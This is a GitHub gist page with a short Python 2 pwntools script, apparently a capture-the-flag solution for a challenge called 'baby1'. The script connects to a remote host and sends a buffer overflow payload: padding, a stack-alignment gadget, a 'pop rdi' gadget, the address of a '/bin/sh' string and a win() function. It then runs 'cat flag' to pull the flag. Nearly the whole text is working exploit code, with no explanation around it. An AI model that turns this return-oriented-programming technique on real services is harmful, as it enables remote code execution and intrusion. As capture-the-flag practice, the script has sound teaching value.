Skip to content

Instantly share code, notes, and snippets.

@0xb0bb

0xb0bb/baby1.py

Created May 23, 2019
Embed
What would you like to do?
#!/usr/bin/env python2
from pwn import *
import sys
# context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
def fail(msg):
log.info("Exploit failed: {}".format(msg))
exit(1)
def success(msg):
log.success("{}".format(msg))
exit(1337)
def main():
HOST, PORT = sys.argv[1].split(':')
io = remote(HOST, PORT)
rop = cyclic(24)
rop += p64(0x40053e) # ret (for stack alignment so system() does not crash due to xmm SSE registers)
rop += p64(0x400793) # pop rdi ; ret
rop += p64(0x400286) # /bin/sh
rop += p64(0x400698) # win()
print io.recvuntil(': ')[:-7]
io.sendline(rop)
io.sendline('cat flag')
flag = io.recvline().strip()
return flag
if __name__== '__main__':
if len(sys.argv) < 2:
fail('No target')
flag = main()
if flag.startswith("sctf{"):
success(flag)
fail("")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment